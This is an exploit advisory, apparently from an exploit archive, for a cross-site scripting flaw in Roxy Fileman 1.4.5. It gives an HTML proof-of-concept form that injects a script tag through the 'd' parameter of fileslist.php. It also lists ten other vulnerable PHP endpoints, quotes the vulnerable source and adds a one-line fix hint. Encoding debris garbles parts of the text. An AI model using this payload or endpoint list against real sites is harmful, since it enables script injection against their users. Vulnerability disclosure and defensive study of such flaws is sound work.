*=============================================================|
| Exploit Title:A  Roxy Fileman Cross Site Scripting
|
| Exploit Author: Ashiyane Digital Security Team
|
| Vendor Homepage: http://www.roxyfileman.com/
|
| Download Link : http://www.roxyfileman.com/download.php?f=1.4.5-php
|
| Version : V 1.4.5
|
| Platform : PHP
|
| Tested on:A  Kali Linux 
|
| Date: 1 /12 / 2017
*=============================================================|
| Exploit Code: 
| 
|<HTML>
|<HEAD>
|A A A  <TITLE>Roxy Fileman Cross Site Scripting</TITLE>
|</HEAD>
|<BODY>
|<form action="http://Target/[PATH]/fileman/php/fileslist.php" method="post">
| <input type="hidden" id="d" value="=%252F2%252Ffileman%252FUploads'%22()%26%25"><script>alert('M.R.S.L.Y')</script>/>
|</form>
|</BODY>
|</HTML>
|
*=======================|
| vulnerability Method : GET & POST
| Files that have this vulnerability :
|
| http://Target/[PATH]/fileman/php/copydir.php
| http://Target/[PATH]/fileman/php/copyfile.php
| http://Target/[PATH]/fileman/php/createdir.php
| http://Target/[PATH]/fileman/php/deletedir.php
| http://Target/[PATH]/fileman/php/renamedir.php
| http://Target/[PATH]/fileman/php/thumb.php
| http://Target/[PATH]/fileman/php/movefile.php
| http://Target/[PATH]/fileman/php/downloaddir.php
| http://Target/[PATH]/fileman/php/dirtree.php
| http://Target/[PATH]/fileman/php/movedir.php
*=======================|
|How to fix this vulnerability :
|
|You should first try to f.ilter all input variables O After use command echo in script :)
|
*=======================|
|Vulnerable code For Example:
|
|include '../system.inc.php';
|include 'functions.inc.php';
|
|verifyAction('FILESLIST');
|checkAccess('FILESLIST');
|
|$path = (empty($_POST['d'])? getFilesPath(): $_POST['d']);
|$type = (empty($_POST['type'])?'':strtolower($_POST['type']));
|if($type != 'image' && $type != 'flash')
|A  $type = '';
|verifyPath($path);
|
|$files = listDirectory(fixPath($path), 0);
|natcasesort($files);
|$str = '';
|echo '[';
|foreach ($files as $f){
|A  $fullPath = $path.'/'.$f;
|A  if(!is_file(fixPath($fullPath)) || ($type == 'image' && !RoxyFile::IsImage($f)) || ($type == 'flash' && !RoxyFile::IsFlash($f)))
|A A A  continue;
|A  $size = filesize(fixPath($fullPath));
|A  $time = filemtime(fixPath($fullPath));
|A  $w = 0;
|A  $h = 0;
|A  if(RoxyFile::IsImage($f)){
|A A A  $tmp = @getimagesize(fixPath($fullPath));
|A A A  if($tmp){
|A A A A A  $w = $tmp[0];
|A A A A A  $h = $tmp[1];
|A A A  }
|A  }
|A  $str .= '{"p":"'.mb_ereg_replace('"', '\\"', $fullPath).'","s":"'.$size.'","t":"'.$time.'","w":"'.$w.'","h":"'.$h.'"},';
|}
|$str = mb_substr($str, 0, -1);
|echo $str;
|echo ']';
|?>A  
*=============================================================|
| Special Thanks To : Ehsan Cod3r O micle O Und3rgr0und O Amir.ght O
| xenotixO modiretO V For Vendetta O Alireza O r4ouf O Spoofer O
| And All Of My Friends O The Last One : My Self, M.R.S.L.YA  
*=============================================================|A